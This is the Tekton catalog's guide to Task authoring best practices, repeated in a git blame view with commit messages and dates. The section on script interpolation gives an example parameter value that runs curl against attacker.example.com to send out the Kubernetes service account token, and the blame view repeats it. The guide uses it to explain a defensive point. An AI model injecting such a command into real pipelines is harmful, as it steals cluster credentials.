catalog/recommendations.md

# Task Authoring Recommendations

This is a collection of recommendations for developers authoring Tasks, with
justifications for why they are recommended.

These are just _recommendations_, and there may be situations where the
recommendation cannot or should not be followed.

This is a living document. Recommendations may be added in the future, or
existing recommendations may change or be clarified.

If you have a question or would like to add a recommendation, please [file an
issue](https://github.com/tektoncd/catalog/issues/new).

## Reference Images by Digest

Where possible, an image used in a step should be referenced by digest (i.e.,
`busybox@sha256:abcde...`) instead of by tag (`busybox:latest`). This ties the
Task to the exact specific version of the image, and prevents unexpected
changes.

Referencing by tag (`:latest` or `:v1.2.3`) means that an owner of that image
can push a new image to that tag, and all Tasks that reference the image by
that tag will start using it immediately. This can lead to unexpected Task
failures, or silent behavior changes, including security-sensitive changes.

## Run as non root and non privileged

One of the security best practices of containers is to run them as a
non-root user. Usually this is achieved by having a user defined in
your image and having it referred in your image configuration. You can
see
[here](https://docs.docker.com/develop/develop-images/dockerfile_best-practices/#user)
for details on best practice with `Dockerfile`s.

You should also avoid as much as possible to run containers as
[privileged](https://stackoverflow.com/questions/36425230/privileged-containers-and-capabilities).

> The --privileged flag gives all capabilities to the container, and
> it also lifts all the limitations enforced by the device cgroup
> controller. In other words, the container can then do almost
> everything that the host can do. This flag exists to allow special
> use-cases, like running Docker within Docker.

On the catalog, this means that you should, where possible:
- **ensure the image you are using can run as non-root** ; any step
  that do not specify explicitly that it needs to be run as root
  should work when running as a user.
- if your step really need to be run as root, specify it in the task
  using
  [`securityContext`](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/),
  same applies for `privileged`.

  ```yaml
  # […]
    steps:
    - name: foo
      image: myimage
      securityContext:
        runAsUser: 0 # root uid == 0
        privileged: true
  ```

## Remember that there are other languages than sh and bash

Yes, sh and bash are DSLs for running processes, but sometimes there
are other languages more suited for what you're trying to do.  Tekton
Pipelines' main positive attribute is the ability to have the right
tool available for every step, including the _interpreter_.
Use python or another scripting languages when that is warranted.

A python example:

```
  steps:
    - name: foo
      image: python:alpine
      script: |
        #!/bin/env python
        import os
        print(os.getenv('PARAM_ONE'))
```

## Don't use interpolation in scripts or string arguments

Using `$(tekton.task)` interpolation in the `script` or as a `sh -c`
string is extremely fragile.  The interpolation done by tekton is not
aware of the context in which the interpolation happens.  A space, a
quote sign, a backslash or newline could easily thwart an otherwise
beautiful script.

```
  steps:
  - name: foo
    image: myimage
    script: |
      echo $(params.one)
```

If `params.one` happens to contain a quote, then the resulting shell
script might look like this:

```
echo '
```

This script is not valid, and the task will fail:

```
sh: 1: Syntax error: Unterminated quoted string
```

This goes for standard shell scripts, python scripts or any other
script where tekton ends up interpolating variables.  Different
languages have different quoting rules in different contexts, but a
maliciously formed parameter would be able to break out of any
quoting.

No amount of escaping will be air-tight.  Even python `"""` strings.
A maliciously formed parameter just needs to include another `"""` to
close the string:

```
    script: |
      #!/bin/env python
      value = """$(params.one)"""
      print(value)
```

If the parameter has the value `"""` followed by a line break, then
the anything after the parameter's newline will be interpreted as
**python code**, probably causing the script to fail, or worse.

Instead, use environment variables or arguments, which are not
interpolated into the script source code:

```
  steps:
  - name: foo
    image: myimage
    env:
      - name: PARAM_ONE
        value: $(params.one)
    args:
      - $(params.one)
    script: |
      echo "$PARAM_ONE"
      echo "$1"
```

The script will now correctly print out the value of params.one,
regardless of what it contains; both environment variables and
arguments.

It is worth mentioning that an interpolated script (i.e. one that has
`$(params.values)` in it) is a security problem.  If an attacker is
able to send in a parameter value that looks something like `$(curl -s
http://attacker.example.com/?value=$(cat
/var/run/secrets/kubernetes.io/serviceaccount/token))`, then the
attacker would be able to exfiltrate the service account token for the
TaskRun.

## Extract task code (scripts) to their own files

As a task grows in complexity, it becomes harder and harder to
maintain it in-line.  Because you have already avoided interpolation
in the script, there is no real need for the script to be in-lined
into the Task.

Use a ConfigMap for your script, and mount the configmap in the task.
Use a single _command:_ that executes your script (optionally with
environment variables and with parameters):


```
  volumes:
  - name: scripts
    configMap:
      name: my-task-scripts
      defaultMode: 0755
  steps:
  - name: foo
    image: myimage
    volumeMounts:
    - name: scripts
      mountPath: /mnt/scripts
    volume
    command:
    - /mnt/scripts/my-command.sh
```

This allows you to create and update your configmap from a real
script.  An external script-file allows you to edit it stand-alone as
a proper script file, rather than in-lined into a tekton task yaml
file.  This gives you better completion, syntax checking, and many
other benefits.  You can even run the script locally.


```
#!/bin/bash
# my-command.sh
echo "${PARAM_ONE-Hello world}"
```

To create the configmap:

```
kubectl create configmap my-task-scripts --from-file=my-command.sh
```

For bonus points, use a kustomize generator to create your task; this
allows you simple "kubectl apply -k".

## Test and verify your task code

Use sound engineering principles when building Tekton Task code.
Since the code can reside in external files, it's possible to split
them up and have test harnesses that test various code paths.  Have a
build system that runs the task's test harness whenever you make
changes to them before you commit, and of course a Tekton Pipeline to
verify that your tests are passing before merging.

## Create idempotent tasks and pipelines

When you design tasks and pipelines, they should, as much as possible
be written in an idempotent manner.  Idempotency means that it is safe
to re-execute, and this can be used to your advantage.  If designed
properly, it can also allow you to skip work that has already happened
(see level-based approach).

## Clearly define the format of input parameters and results

Specify the format when defining parameters and results, even down to
trailing whitespace.  Specify the intention behind them.  For
parameters, indicate if there are other tasks that might have an output
that matches.  For a result, indicate where you might use the result.

This is especially important when building tasks that may be composed
in different ways, and where the results of some tasks are intended to
be the parameters to other tasks.

## Use composable parameter formats

Especially when passing lists of items between tasks (i.e. a list of
items from one task, designed to be the parameter of another task),
avoid using structured strings, tab-separated values, or even
line-separated values.  Such formats are prone to error due to simple
whitespace mistakes, or a rogue value that contains a hard-to-detect
newline.

Instead use a more structured data format like e.g. a json stream or
more formally [JSON Text Sequences RFC
7464](https://tools.ietf.org/html/rfc7464), and use jq to process the
different _records_ that are passed in to a task.  This ensures you
can pass almost any conceivable type of data without any escaping
issues.

```
# task foo
  steps:
  - name: foo
    image: myimage
    script: |
      echo '{"value": 123}' >> $(results.data.path)

# task other
  steps:
  - name: bar
    image: myimage
    script: |
      printf '{"size": "large"}' >> $(results.data.path)
      printf '{"size": "small", "fake": true}' >> $(results.data.path)

# pipeline
  - name: example
    taskRef:
      kind: Task
      name: pipeline
    params:
    - name: data
      value: |
        $(tasks.foo.results.data)
        $(tasks.bar.results.data)
```

Here, the "foo" and "bar" task results and the "data" parameter of the
pipeline have been defined to be _of type JSON Stream_, allowing the
pipeline author to construct the pipeline parameter value directly by
concatenating the results.  This construct does not fall apart when
the data is on one line or split on multiple lines.

## Use "level-based" approach to your advantage

If you have a task that creates another pipelinerun in order to
complete its work, you should leverage the fact that `kubectl apply`
has "create-or-update" semantics.  If you _apply_ a pipelinerun that
already exists, it means that you don't need to rerun the pipeline.

For example, if you have a task that takes a commit as a parameter,
say `abc123def`, and its job is to create a pipelinerun with that
commit as a parameter (and the other pipeline is idempotent, and does
not need to be re-run for the same commit), then you could _apply_ the
pipelinerun `run-abc123def`.  The first time, `run-abc123def` won't
exist, and a PipelineRun will be created, running the pipeline.  If,
at a later point in time, the task happens to be run with the same
commit, it will again _apply_ the pipelinerun `run-abc123def`.  Since
it already exists, nothing happens.

This technique can be used to "short circuit" work when it is not
necessary to _re-run_.
Create recommendations.md 2020-04-22 17:40:56 +00:00			`# Task Authoring Recommendations`
Add a "Run as non root" recommandation… … also talk a little bit about `privileged` and how to be explicit in the task if it needs to be run as root and/or privileged. Signed-off-by: Vincent Demeester <vdemeest@redhat.com> 2020-06-09 16:30:34 +00:00
Create recommendations.md 2020-04-22 17:40:56 +00:00			`This is a collection of recommendations for developers authoring Tasks, with`
			`justifications for why they are recommended.`

			`These are just _recommendations_, and there may be situations where the`
			`recommendation cannot or should not be followed.`

			`This is a living document. Recommendations may be added in the future, or`
			`existing recommendations may change or be clarified.`

			`If you have a question or would like to add a recommendation, please [file an`
			`issue](https://github.com/tektoncd/catalog/issues/new).`

			`## Reference Images by Digest`

			`Where possible, an image used in a step should be referenced by digest (i.e.,`
			`busybox@sha256:abcde...`) instead of by tag (`busybox:latest`). This ties the
			`Task to the exact specific version of the image, and prevents unexpected`
			`changes.`

			Referencing by tag (`:latest` or `:v1.2.3`) means that an owner of that image
			`can push a new image to that tag, and all Tasks that reference the image by`
			`that tag will start using it immediately. This can lead to unexpected Task`
			`failures, or silent behavior changes, including security-sensitive changes.`
Add a "Run as non root" recommandation… … also talk a little bit about `privileged` and how to be explicit in the task if it needs to be run as root and/or privileged. Signed-off-by: Vincent Demeester <vdemeest@redhat.com> 2020-06-09 16:30:34 +00:00
			`## Run as non root and non privileged`

			`One of the security best practices of containers is to run them as a`
			`non-root user. Usually this is achieved by having a user defined in`
			`your image and having it referred in your image configuration. You can`
			`see`
			`[here](https://docs.docker.com/develop/develop-images/dockerfile_best-practices/#user)`
			for details on best practice with `Dockerfile`s.

			`You should also avoid as much as possible to run containers as`
			`[privileged](https://stackoverflow.com/questions/36425230/privileged-containers-and-capabilities).`

			`> The --privileged flag gives all capabilities to the container, and`
			`> it also lifts all the limitations enforced by the device cgroup`
			`> controller. In other words, the container can then do almost`
			`> everything that the host can do. This flag exists to allow special`
			`> use-cases, like running Docker within Docker.`

			`On the catalog, this means that you should, where possible:`
			`- ensure the image you are using can run as non-root ; any step`
			`that do not specify explicitly that it needs to be run as root`
			`should work when running as a user.`
			`- if your step really need to be run as root, specify it in the task`
			`using`
			[`securityContext`](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/),
			same applies for `privileged`.

			```yaml
			`# […]`
			`steps:`
			`- name: foo`
			`image: myimage`
			`securityContext:`
			`runAsUser: 0 # root uid == 0`
			`privileged: true`
			```
Add recommendations for authoring tasks 2021-01-25 22:17:29 +00:00
fixup! Add recommendations for authoring tasks 2021-01-25 22:18:08 +00:00			`## Remember that there are other languages than sh and bash`

			`Yes, sh and bash are DSLs for running processes, but sometimes there`
			`are other languages more suited for what you're trying to do. Tekton`
			`Pipelines' main positive attribute is the ability to have the right`
improved wording a little 2021-02-18 06:39:03 +00:00			`tool available for every step, including the _interpreter_.`
fixup! Add recommendations for authoring tasks 2021-01-25 22:18:08 +00:00			`Use python or another scripting languages when that is warranted.`

			`A python example:`

			```
			`steps:`
			`- name: foo`
			`image: python:alpine`
			`script: \|`
			`#!/bin/env python`
			`import os`
			`print(os.getenv('PARAM_ONE'))`
			```

			`## Don't use interpolation in scripts or string arguments`
Add recommendations for authoring tasks 2021-01-25 22:17:29 +00:00
			Using `$(tekton.task)` interpolation in the `script` or as a `sh -c`
			`string is extremely fragile. The interpolation done by tekton is not`
			`aware of the context in which the interpolation happens. A space, a`
			`quote sign, a backslash or newline could easily thwart an otherwise`
			`beautiful script.`

			```
			`steps:`
			`- name: foo`
			`image: myimage`
			`script: \|`
			`echo $(params.one)`
			```

Fix typo in recommendations.md 2021-03-09 14:31:01 +00:00			If `params.one` happens to contain a quote, then the resulting shell
Add recommendations for authoring tasks 2021-01-25 22:17:29 +00:00			`script might look like this:`

			```
			`echo '`
			```

fixup! Add recommendations for authoring tasks 2021-01-25 22:18:08 +00:00			`This script is not valid, and the task will fail:`

			```
			`sh: 1: Syntax error: Unterminated quoted string`
			```

			`This goes for standard shell scripts, python scripts or any other`
			`script where tekton ends up interpolating variables. Different`
			`languages have different quoting rules in different contexts, but a`
			`maliciously formed parameter would be able to break out of any`
			`quoting.`

			No amount of escaping will be air-tight. Even python `"""` strings.
			A maliciously formed parameter just needs to include another `"""` to
			`close the string:`

			```
			`script: \|`
			`#!/bin/env python`
			`value = """$(params.one)"""`
			`print(value)`
			```

			If the parameter has the value `"""` followed by a line break, then
			`the anything after the parameter's newline will be interpreted as`
			`python code, probably causing the script to fail, or worse.`
Add recommendations for authoring tasks 2021-01-25 22:17:29 +00:00
			`Instead, use environment variables or arguments, which are not`
fixup! Add recommendations for authoring tasks 2021-01-25 22:18:08 +00:00			`interpolated into the script source code:`
Add recommendations for authoring tasks 2021-01-25 22:17:29 +00:00
			```
			`steps:`
			`- name: foo`
			`image: myimage`
			`env:`
			`- name: PARAM_ONE`
			`value: $(params.one)`
fixup! Add recommendations for authoring tasks 2021-01-25 22:18:08 +00:00			`args:`
			`- $(params.one)`
Add recommendations for authoring tasks 2021-01-25 22:17:29 +00:00			`script: \|`
			`echo "$PARAM_ONE"`
fixup! Add recommendations for authoring tasks 2021-01-25 22:18:08 +00:00			`echo "$1"`
Add recommendations for authoring tasks 2021-01-25 22:17:29 +00:00			```

fixup! Add recommendations for authoring tasks 2021-01-25 22:18:08 +00:00			`The script will now correctly print out the value of params.one,`
			`regardless of what it contains; both environment variables and`
			`arguments.`
Add recommendations for authoring tasks 2021-01-25 22:17:29 +00:00
fixup! Add recommendations for authoring tasks 2021-01-25 22:18:08 +00:00			`It is worth mentioning that an interpolated script (i.e. one that has`
			`$(params.values)` in it) is a security problem. If an attacker is
			able to send in a parameter value that looks something like `$(curl -s
			`http://attacker.example.com/?value=$(cat`
			/var/run/secrets/kubernetes.io/serviceaccount/token))`, then the
			`attacker would be able to exfiltrate the service account token for the`
			`TaskRun.`
Add recommendations for authoring tasks 2021-01-25 22:17:29 +00:00
			`## Extract task code (scripts) to their own files`

			`As a task grows in complexity, it becomes harder and harder to`
			`maintain it in-line. Because you have already avoided interpolation`
			`in the script, there is no real need for the script to be in-lined`
			`into the Task.`

			`Use a ConfigMap for your script, and mount the configmap in the task.`
			`Use a single _command:_ that executes your script (optionally with`
			`environment variables and with parameters):`


			```
			`volumes:`
			`- name: scripts`
			`configMap:`
			`name: my-task-scripts`
			`defaultMode: 0755`
			`steps:`
			`- name: foo`
			`image: myimage`
			`volumeMounts:`
			`- name: scripts`
			`mountPath: /mnt/scripts`
			`volume`
improved wording a little 2021-02-18 06:39:03 +00:00			`command:`
Add recommendations for authoring tasks 2021-01-25 22:17:29 +00:00			`- /mnt/scripts/my-command.sh`
			```

			`This allows you to create and update your configmap from a real`
			`script. An external script-file allows you to edit it stand-alone as`
			`a proper script file, rather than in-lined into a tekton task yaml`
			`file. This gives you better completion, syntax checking, and many`
			`other benefits. You can even run the script locally.`


			```
			`#!/bin/bash`
			`# my-command.sh`
			`echo "${PARAM_ONE-Hello world}"`
			```

			`To create the configmap:`

			```
			`kubectl create configmap my-task-scripts --from-file=my-command.sh`
			```

			`For bonus points, use a kustomize generator to create your task; this`
fixup! Add recommendations for authoring tasks 2021-01-25 22:18:08 +00:00			`allows you simple "kubectl apply -k".`
Add recommendations for authoring tasks 2021-01-25 22:17:29 +00:00
			`## Test and verify your task code`

			`Use sound engineering principles when building Tekton Task code.`
			`Since the code can reside in external files, it's possible to split`
			`them up and have test harnesses that test various code paths. Have a`
			`build system that runs the task's test harness whenever you make`
			`changes to them before you commit, and of course a Tekton Pipeline to`
			`verify that your tests are passing before merging.`

			`## Create idempotent tasks and pipelines`

			`When you design tasks and pipelines, they should, as much as possible`
			`be written in an idempotent manner. Idempotency means that it is safe`
			`to re-execute, and this can be used to your advantage. If designed`
			`properly, it can also allow you to skip work that has already happened`
			`(see level-based approach).`

			`## Clearly define the format of input parameters and results`

			`Specify the format when defining parameters and results, even down to`
			`trailing whitespace. Specify the intention behind them. For`
			`parameters, indicate if there are other tasks that might have an output`
			`that matches. For a result, indicate where you might use the result.`

			`This is especially important when building tasks that may be composed`
			`in different ways, and where the results of some tasks are intended to`
			`be the parameters to other tasks.`

			`## Use composable parameter formats`

Fix typo in recommendations.md 2021-03-09 14:31:01 +00:00			`Especially when passing lists of items between tasks (i.e. a list of`
Add recommendations for authoring tasks 2021-01-25 22:17:29 +00:00			`items from one task, designed to be the parameter of another task),`
			`avoid using structured strings, tab-separated values, or even`
			`line-separated values. Such formats are prone to error due to simple`
			`whitespace mistakes, or a rogue value that contains a hard-to-detect`
			`newline.`

			`Instead use a more structured data format like e.g. a json stream or`
			`more formally [JSON Text Sequences RFC`
			`7464](https://tools.ietf.org/html/rfc7464), and use jq to process the`
			`different _records_ that are passed in to a task. This ensures you`
			`can pass almost any conceivable type of data without any escaping`
			`issues.`

			```
			`# task foo`
			`steps:`
			`- name: foo`
			`image: myimage`
			`script: \|`
			`echo '{"value": 123}' >> $(results.data.path)`

			`# task other`
			`steps:`
			`- name: bar`
			`image: myimage`
			`script: \|`
			`printf '{"size": "large"}' >> $(results.data.path)`
			`printf '{"size": "small", "fake": true}' >> $(results.data.path)`

			`# pipeline`
			`- name: example`
			`taskRef:`
			`kind: Task`
			`name: pipeline`
			`params:`
			`- name: data`
			`value: \|`
			`$(tasks.foo.results.data)`
			`$(tasks.bar.results.data)`
			```

			`Here, the "foo" and "bar" task results and the "data" parameter of the`
			`pipeline have been defined to be _of type JSON Stream_, allowing the`
			`pipeline author to construct the pipeline parameter value directly by`
Fix typo in recommendations.md 2021-03-09 14:31:01 +00:00			`concatenating the results. This construct does not fall apart when`
Add recommendations for authoring tasks 2021-01-25 22:17:29 +00:00			`the data is on one line or split on multiple lines.`

			`## Use "level-based" approach to your advantage`

			`If you have a task that creates another pipelinerun in order to`
			complete its work, you should leverage the fact that `kubectl apply`
			`has "create-or-update" semantics. If you _apply_ a pipelinerun that`
			`already exists, it means that you don't need to rerun the pipeline.`

			`For example, if you have a task that takes a commit as a parameter,`
			say `abc123def`, and its job is to create a pipelinerun with that
			`commit as a parameter (and the other pipeline is idempotent, and does`
			`not need to be re-run for the same commit), then you could _apply_ the`
			pipelinerun `run-abc123def`. The first time, `run-abc123def` won't
			`exist, and a PipelineRun will be created, running the pipeline. If,`
			`at a later point in time, the task happens to be run with the same`
			commit, it will again _apply_ the pipelinerun `run-abc123def`. Since
			`it already exists, nothing happens.`

			`This technique can be used to "short circuit" work when it is not`
			`necessary to _re-run_.`